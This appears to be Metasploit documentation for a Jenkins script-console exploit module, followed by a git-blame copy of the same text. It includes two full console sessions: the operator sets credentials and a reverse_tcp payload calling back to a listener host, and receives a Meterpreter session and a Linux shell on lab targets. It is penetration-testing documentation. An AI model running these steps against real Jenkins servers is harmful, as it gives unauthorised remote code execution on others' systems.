documentation/modules/exploit/multi/http/jenkins_script_console.md

## Vulnerable Application

  Jenkins can be downloaded from [jenkins.io](https://jenkins.io/) where
  binaries are available for a variety of operating systems. Both LTS and weekly
  builds are available.

  Default settings have the script console enabled and require a valid user
  account in order to access it. A known account can be used with this module by
  setting the `USERNAME` and `PASSWORD` options.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/jenkins_script_console```
  4. Do: ```set RHOST [target host]```
  5. Do: ```set TARGET [target id]```
  6. Do: ```exploit```
  7. You should get a shell.

## Options

  **TARGETURI**

  The path to the target instance of Jenkins.

  **USERNAME**

  A username to an account that has access to the script console. This is only
  necessary if the Jenkins instance has been configured to require
  authentication.

  **PASSWORD**

  A password to an account that has access to the script console. This is only
  necessary if the Jenkins instance has been configured to require
  authentication and you aren't using an API_TOKEN (see below).

  **API_TOKEN**

  An API token to an account that has access to the script console. This is only
  necessary if the Jenkins instance has been configured to require
  authentication and you aren't using a PASSWORD (see above).

## Scenarios

  Example usage against a Windows 7 SP1 x64 bit target running Jenkins 2.19.1.

  ```
  msf > use exploit/multi/http/jenkins_script_console
  msf exploit(jenkins_script_console) > set TARGETURI /
  TARGETURI => /
  msf exploit(jenkins_script_console) > set USERNAME steiner
  USERNAME => steiner
  msf exploit(jenkins_script_console) > set PASSWORD I<3msf!
  PASSWORD => I<3msf!
  msf exploit(jenkins_script_console) > set RHOST 192.168.254.126
  RHOST => 192.168.254.126
  msf exploit(jenkins_script_console) > set RPORT 8080
  RPORT => 8080
  msf exploit(jenkins_script_console) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(jenkins_script_console) > set LHOST 192.168.254.132
  LHOST => 192.168.254.132
  msf exploit(jenkins_script_console) > exploit

  [*] [2016.10.29-18:43:07] Started reverse TCP handler on 192.168.254.132:4444
  [*] [2016.10.29-18:43:07] Checking access to the script console
  [*] [2016.10.29-18:43:07] Logging in...
  [*] [2016.10.29-18:43:07] Using CSRF token: '9623d245b9d60b5ceda72e2d3613431c' (Jenkins-Crumb style)
  [*] [2016.10.29-18:43:07] 192.168.254.126:8080 - Sending command stager...
  [*] [2016.10.29-18:43:08] Command Stager progress -   2.06% done (2048/99626 bytes)
  [*] [2016.10.29-18:43:08] Command Stager progress -   4.11% done (4096/99626 bytes)
  [*] [2016.10.29-18:43:08] Command Stager progress -   6.17% done (6144/99626 bytes)
  [*] [2016.10.29-18:43:09] Command Stager progress -   8.22% done (8192/99626 bytes)
  [*] [2016.10.29-18:43:09] Command Stager progress -  10.28% done (10240/99626 bytes)
  [*] [2016.10.29-18:43:09] Command Stager progress -  12.33% done (12288/99626 bytes)
  [*] [2016.10.29-18:43:10] Command Stager progress -  14.39% done (14336/99626 bytes)
  [*] [2016.10.29-18:43:10] Command Stager progress -  16.45% done (16384/99626 bytes)
  [*] [2016.10.29-18:43:10] Command Stager progress -  18.50% done (18432/99626 bytes)
  [*] [2016.10.29-18:43:11] Command Stager progress -  20.56% done (20480/99626 bytes)
  [*] [2016.10.29-18:43:11] Command Stager progress -  22.61% done (22528/99626 bytes)
  [*] [2016.10.29-18:43:11] Command Stager progress -  24.67% done (24576/99626 bytes)
  [*] [2016.10.29-18:43:12] Command Stager progress -  26.72% done (26624/99626 bytes)
  [*] [2016.10.29-18:43:12] Command Stager progress -  28.78% done (28672/99626 bytes)
  [*] [2016.10.29-18:43:12] Command Stager progress -  30.84% done (30720/99626 bytes)
  [*] [2016.10.29-18:43:13] Command Stager progress -  32.89% done (32768/99626 bytes)
  [*] [2016.10.29-18:43:13] Command Stager progress -  34.95% done (34816/99626 bytes)
  [*] [2016.10.29-18:43:13] Command Stager progress -  37.00% done (36864/99626 bytes)
  [*] [2016.10.29-18:43:14] Command Stager progress -  39.06% done (38912/99626 bytes)
  [*] [2016.10.29-18:43:14] Command Stager progress -  41.11% done (40960/99626 bytes)
  [*] [2016.10.29-18:43:14] Command Stager progress -  43.17% done (43008/99626 bytes)
  [*] [2016.10.29-18:43:15] Command Stager progress -  45.23% done (45056/99626 bytes)
  [*] [2016.10.29-18:43:15] Command Stager progress -  47.28% done (47104/99626 bytes)
  [*] [2016.10.29-18:43:15] Command Stager progress -  49.34% done (49152/99626 bytes)
  [*] [2016.10.29-18:43:16] Command Stager progress -  51.39% done (51200/99626 bytes)
  [*] [2016.10.29-18:43:16] Command Stager progress -  53.45% done (53248/99626 bytes)
  [*] [2016.10.29-18:43:17] Command Stager progress -  55.50% done (55296/99626 bytes)
  [*] [2016.10.29-18:43:17] Command Stager progress -  57.56% done (57344/99626 bytes)
  [*] [2016.10.29-18:43:17] Command Stager progress -  59.61% done (59392/99626 bytes)
  [*] [2016.10.29-18:43:18] Command Stager progress -  61.67% done (61440/99626 bytes)
  [*] [2016.10.29-18:43:18] Command Stager progress -  63.73% done (63488/99626 bytes)
  [*] [2016.10.29-18:43:18] Command Stager progress -  65.78% done (65536/99626 bytes)
  [*] [2016.10.29-18:43:19] Command Stager progress -  67.84% done (67584/99626 bytes)
  [*] [2016.10.29-18:43:19] Command Stager progress -  69.89% done (69632/99626 bytes)
  [*] [2016.10.29-18:43:19] Command Stager progress -  71.95% done (71680/99626 bytes)
  [*] [2016.10.29-18:43:20] Command Stager progress -  74.00% done (73728/99626 bytes)
  [*] [2016.10.29-18:43:20] Command Stager progress -  76.06% done (75776/99626 bytes)
  [*] [2016.10.29-18:43:20] Command Stager progress -  78.12% done (77824/99626 bytes)
  [*] [2016.10.29-18:43:21] Command Stager progress -  80.17% done (79872/99626 bytes)
  [*] [2016.10.29-18:43:21] Command Stager progress -  82.23% done (81920/99626 bytes)
  [*] [2016.10.29-18:43:21] Command Stager progress -  84.28% done (83968/99626 bytes)
  [*] [2016.10.29-18:43:22] Command Stager progress -  86.34% done (86016/99626 bytes)
  [*] [2016.10.29-18:43:22] Command Stager progress -  88.39% done (88064/99626 bytes)
  [*] [2016.10.29-18:43:22] Command Stager progress -  90.45% done (90112/99626 bytes)
  [*] [2016.10.29-18:43:23] Command Stager progress -  92.51% done (92160/99626 bytes)
  [*] [2016.10.29-18:43:23] Command Stager progress -  94.56% done (94208/99626 bytes)
  [*] [2016.10.29-18:43:23] Command Stager progress -  96.62% done (96256/99626 bytes)
  [*] [2016.10.29-18:43:24] Command Stager progress -  98.67% done (98304/99626 bytes)
  [*] [2016.10.29-18:43:24] Sending stage (957999 bytes) to 192.168.254.126
  [*] [2016.10.29-18:43:24] Command Stager progress - 100.00% done (99626/99626 bytes)
  [*] Meterpreter session 1 opened (192.168.254.132:4444 -> 192.168.254.126:49258) at 2016-10-29 18:43:26 -0400

  meterpreter > sysinfo
  Computer        : PWNME-PC
  OS              : Windows 7 (Build 7601, Service Pack 1).
  Architecture    : x64 (Current Process is WOW64)
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/win32
  meterpreter >

  ```

  Example usage against a Linux x64 bit target running Jenkins 2.46.3.

  ```
  msf > use exploit/multi/http/jenkins_script_console
  msf exploit(jenkins_script_console) > set RHOST 172.17.0.1
  RHOST => 172.17.0.1
  msf exploit(jenkins_script_console) > set RPORT 8080
  RPORT => 8080
  msf exploit(jenkins_script_console) > set TARGETURI /
  TARGETURI => /
  msf exploit(jenkins_script_console) > set USERNAME admin
  USERNAME => admin
  msf exploit(jenkins_script_console) > set API_TOKEN 24e0b80d009ed12590ff85866d88c00d
  API_TOKEN => 24e0b80d009ed12590ff85866d88c00d
  msf exploit(jenkins_script_console) > set TARGET 1
  TARGET => 1
  msf exploit(jenkins_script_console) > set PAYLOAD linux/x86/shell/reverse_tcp
  PAYLOAD => linux/x86/shell/reverse_tcp
  msf exploit(jenkins_script_console) > set LHOST 10.0.2.4
  LHOST => 10.0.2.4
  msf exploit(jenkins_script_console) > exploit

  [*] Started reverse TCP handler on 10.0.2.4:4444 
  [*] Checking access to the script console
  [*] Authenticating with token...
  [*] Using CSRF token: 'd41639a6f5721760a8ee3df5d6a71eec' (Jenkins-Crumb style)
  [*] 172.17.0.1:8080 - Sending Linux stager...
  [*] Sending stage (36 bytes) to 172.17.0.2
  [*] Command shell session 1 opened (10.0.2.4:4444 -> 172.17.0.2:53962) at 2017-06-19 16:55:42 -0500
  [!] Deleting /tmp/AsqL5Pg payload file

  whoami
  jenkins
  id
  uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
  uname -a
  Linux b4b4e715101e 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 GNU/Linux
  ```
Add documentation for jenkins_script_console 2016-10-29 16:50:47 -04:00			`## Vulnerable Application`

			`Jenkins can be downloaded from [jenkins.io](https://jenkins.io/) where`
			`binaries are available for a variety of operating systems. Both LTS and weekly`
			`builds are available.`

			`Default settings have the script console enabled and require a valid user`
Address pull request feedback for module docs 2016-10-29 18:50:16 -04:00			`account in order to access it. A known account can be used with this module by`
Add documentation for jenkins_script_console 2016-10-29 16:50:47 -04:00			setting the `USERNAME` and `PASSWORD` options.

			`## Verification Steps`

			`1. Install the application`
doc cleanup 2020-03-24 08:47:21 -04:00			`2. Start msfconsole`
			3. Do: ```use exploit/multi/http/jenkins_script_console```
			4. Do: ```set RHOST [target host]```
			5. Do: ```set TARGET [target id]```
			6. Do: ```exploit```
			`7. You should get a shell.`
Add documentation for jenkins_script_console 2016-10-29 16:50:47 -04:00
			`## Options`

			`TARGETURI`

			`The path to the target instance of Jenkins.`

			`USERNAME`

			`A username to an account that has access to the script console. This is only`
			`necessary if the Jenkins instance has been configured to require`
			`authentication.`

Address pull request feedback for module docs 2016-10-29 18:50:16 -04:00			`PASSWORD`

			`A password to an account that has access to the script console. This is only`
			`necessary if the Jenkins instance has been configured to require`
Added docs, minor code tweak to remove duplication. 2017-06-19 17:35:41 -05:00			`authentication and you aren't using an API_TOKEN (see below).`

			`API_TOKEN`

			`An API token to an account that has access to the script console. This is only`
			`necessary if the Jenkins instance has been configured to require`
			`authentication and you aren't using a PASSWORD (see above).`
Address pull request feedback for module docs 2016-10-29 18:50:16 -04:00
Add documentation for jenkins_script_console 2016-10-29 16:50:47 -04:00			`## Scenarios`

Address pull request feedback for module docs 2016-10-29 18:50:16 -04:00			`Example usage against a Windows 7 SP1 x64 bit target running Jenkins 2.19.1.`
Add documentation for jenkins_script_console 2016-10-29 16:50:47 -04:00
			```
			`msf > use exploit/multi/http/jenkins_script_console`
Address pull request feedback for module docs 2016-10-29 18:50:16 -04:00			`msf exploit(jenkins_script_console) > set TARGETURI /`
			`TARGETURI => /`
			`msf exploit(jenkins_script_console) > set USERNAME steiner`
			`USERNAME => steiner`
			`msf exploit(jenkins_script_console) > set PASSWORD I<3msf!`
			`PASSWORD => I<3msf!`
			`msf exploit(jenkins_script_console) > set RHOST 192.168.254.126`
			`RHOST => 192.168.254.126`
			`msf exploit(jenkins_script_console) > set RPORT 8080`
			`RPORT => 8080`
			`msf exploit(jenkins_script_console) > set PAYLOAD windows/meterpreter/reverse_tcp`
			`PAYLOAD => windows/meterpreter/reverse_tcp`
			`msf exploit(jenkins_script_console) > set LHOST 192.168.254.132`
			`LHOST => 192.168.254.132`
			`msf exploit(jenkins_script_console) > exploit`

			`[*] [2016.10.29-18:43:07] Started reverse TCP handler on 192.168.254.132:4444`
			`[*] [2016.10.29-18:43:07] Checking access to the script console`
			`[*] [2016.10.29-18:43:07] Logging in...`
			`[*] [2016.10.29-18:43:07] Using CSRF token: '9623d245b9d60b5ceda72e2d3613431c' (Jenkins-Crumb style)`
			`[*] [2016.10.29-18:43:07] 192.168.254.126:8080 - Sending command stager...`
			`[*] [2016.10.29-18:43:08] Command Stager progress - 2.06% done (2048/99626 bytes)`
			`[*] [2016.10.29-18:43:08] Command Stager progress - 4.11% done (4096/99626 bytes)`
			`[*] [2016.10.29-18:43:08] Command Stager progress - 6.17% done (6144/99626 bytes)`
			`[*] [2016.10.29-18:43:09] Command Stager progress - 8.22% done (8192/99626 bytes)`
			`[*] [2016.10.29-18:43:09] Command Stager progress - 10.28% done (10240/99626 bytes)`
			`[*] [2016.10.29-18:43:09] Command Stager progress - 12.33% done (12288/99626 bytes)`
			`[*] [2016.10.29-18:43:10] Command Stager progress - 14.39% done (14336/99626 bytes)`
			`[*] [2016.10.29-18:43:10] Command Stager progress - 16.45% done (16384/99626 bytes)`
			`[*] [2016.10.29-18:43:10] Command Stager progress - 18.50% done (18432/99626 bytes)`
			`[*] [2016.10.29-18:43:11] Command Stager progress - 20.56% done (20480/99626 bytes)`
			`[*] [2016.10.29-18:43:11] Command Stager progress - 22.61% done (22528/99626 bytes)`
			`[*] [2016.10.29-18:43:11] Command Stager progress - 24.67% done (24576/99626 bytes)`
			`[*] [2016.10.29-18:43:12] Command Stager progress - 26.72% done (26624/99626 bytes)`
			`[*] [2016.10.29-18:43:12] Command Stager progress - 28.78% done (28672/99626 bytes)`
			`[*] [2016.10.29-18:43:12] Command Stager progress - 30.84% done (30720/99626 bytes)`
			`[*] [2016.10.29-18:43:13] Command Stager progress - 32.89% done (32768/99626 bytes)`
			`[*] [2016.10.29-18:43:13] Command Stager progress - 34.95% done (34816/99626 bytes)`
			`[*] [2016.10.29-18:43:13] Command Stager progress - 37.00% done (36864/99626 bytes)`
			`[*] [2016.10.29-18:43:14] Command Stager progress - 39.06% done (38912/99626 bytes)`
			`[*] [2016.10.29-18:43:14] Command Stager progress - 41.11% done (40960/99626 bytes)`
			`[*] [2016.10.29-18:43:14] Command Stager progress - 43.17% done (43008/99626 bytes)`
			`[*] [2016.10.29-18:43:15] Command Stager progress - 45.23% done (45056/99626 bytes)`
			`[*] [2016.10.29-18:43:15] Command Stager progress - 47.28% done (47104/99626 bytes)`
			`[*] [2016.10.29-18:43:15] Command Stager progress - 49.34% done (49152/99626 bytes)`
			`[*] [2016.10.29-18:43:16] Command Stager progress - 51.39% done (51200/99626 bytes)`
			`[*] [2016.10.29-18:43:16] Command Stager progress - 53.45% done (53248/99626 bytes)`
			`[*] [2016.10.29-18:43:17] Command Stager progress - 55.50% done (55296/99626 bytes)`
			`[*] [2016.10.29-18:43:17] Command Stager progress - 57.56% done (57344/99626 bytes)`
			`[*] [2016.10.29-18:43:17] Command Stager progress - 59.61% done (59392/99626 bytes)`
			`[*] [2016.10.29-18:43:18] Command Stager progress - 61.67% done (61440/99626 bytes)`
			`[*] [2016.10.29-18:43:18] Command Stager progress - 63.73% done (63488/99626 bytes)`
			`[*] [2016.10.29-18:43:18] Command Stager progress - 65.78% done (65536/99626 bytes)`
			`[*] [2016.10.29-18:43:19] Command Stager progress - 67.84% done (67584/99626 bytes)`
			`[*] [2016.10.29-18:43:19] Command Stager progress - 69.89% done (69632/99626 bytes)`
			`[*] [2016.10.29-18:43:19] Command Stager progress - 71.95% done (71680/99626 bytes)`
			`[*] [2016.10.29-18:43:20] Command Stager progress - 74.00% done (73728/99626 bytes)`
			`[*] [2016.10.29-18:43:20] Command Stager progress - 76.06% done (75776/99626 bytes)`
			`[*] [2016.10.29-18:43:20] Command Stager progress - 78.12% done (77824/99626 bytes)`
			`[*] [2016.10.29-18:43:21] Command Stager progress - 80.17% done (79872/99626 bytes)`
			`[*] [2016.10.29-18:43:21] Command Stager progress - 82.23% done (81920/99626 bytes)`
			`[*] [2016.10.29-18:43:21] Command Stager progress - 84.28% done (83968/99626 bytes)`
			`[*] [2016.10.29-18:43:22] Command Stager progress - 86.34% done (86016/99626 bytes)`
			`[*] [2016.10.29-18:43:22] Command Stager progress - 88.39% done (88064/99626 bytes)`
			`[*] [2016.10.29-18:43:22] Command Stager progress - 90.45% done (90112/99626 bytes)`
			`[*] [2016.10.29-18:43:23] Command Stager progress - 92.51% done (92160/99626 bytes)`
			`[*] [2016.10.29-18:43:23] Command Stager progress - 94.56% done (94208/99626 bytes)`
			`[*] [2016.10.29-18:43:23] Command Stager progress - 96.62% done (96256/99626 bytes)`
			`[*] [2016.10.29-18:43:24] Command Stager progress - 98.67% done (98304/99626 bytes)`
			`[*] [2016.10.29-18:43:24] Sending stage (957999 bytes) to 192.168.254.126`
			`[*] [2016.10.29-18:43:24] Command Stager progress - 100.00% done (99626/99626 bytes)`
			`[*] Meterpreter session 1 opened (192.168.254.132:4444 -> 192.168.254.126:49258) at 2016-10-29 18:43:26 -0400`
Add documentation for jenkins_script_console 2016-10-29 16:50:47 -04:00
			`meterpreter > sysinfo`
Address pull request feedback for module docs 2016-10-29 18:50:16 -04:00			`Computer : PWNME-PC`
			`OS : Windows 7 (Build 7601, Service Pack 1).`
			`Architecture : x64 (Current Process is WOW64)`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x86/win32`
			`meterpreter >`

Add documentation for jenkins_script_console 2016-10-29 16:50:47 -04:00			```
Added docs, minor code tweak to remove duplication. 2017-06-19 17:35:41 -05:00
			`Example usage against a Linux x64 bit target running Jenkins 2.46.3.`

			```
			`msf > use exploit/multi/http/jenkins_script_console`
			`msf exploit(jenkins_script_console) > set RHOST 172.17.0.1`
			`RHOST => 172.17.0.1`
			`msf exploit(jenkins_script_console) > set RPORT 8080`
			`RPORT => 8080`
			`msf exploit(jenkins_script_console) > set TARGETURI /`
			`TARGETURI => /`
			`msf exploit(jenkins_script_console) > set USERNAME admin`
			`USERNAME => admin`
			`msf exploit(jenkins_script_console) > set API_TOKEN 24e0b80d009ed12590ff85866d88c00d`
			`API_TOKEN => 24e0b80d009ed12590ff85866d88c00d`
			`msf exploit(jenkins_script_console) > set TARGET 1`
			`TARGET => 1`
			`msf exploit(jenkins_script_console) > set PAYLOAD linux/x86/shell/reverse_tcp`
			`PAYLOAD => linux/x86/shell/reverse_tcp`
			`msf exploit(jenkins_script_console) > set LHOST 10.0.2.4`
			`LHOST => 10.0.2.4`
			`msf exploit(jenkins_script_console) > exploit`

			`[*] Started reverse TCP handler on 10.0.2.4:4444`
			`[*] Checking access to the script console`
			`[*] Authenticating with token...`
			`[*] Using CSRF token: 'd41639a6f5721760a8ee3df5d6a71eec' (Jenkins-Crumb style)`
			`[*] 172.17.0.1:8080 - Sending Linux stager...`
			`[*] Sending stage (36 bytes) to 172.17.0.2`
			`[*] Command shell session 1 opened (10.0.2.4:4444 -> 172.17.0.2:53962) at 2017-06-19 16:55:42 -0500`
			`[!] Deleting /tmp/AsqL5Pg payload file`

			`whoami`
			`jenkins`
			`id`
			`uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)`
			`uname -a`
			`Linux b4b4e715101e 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 GNU/Linux`
			```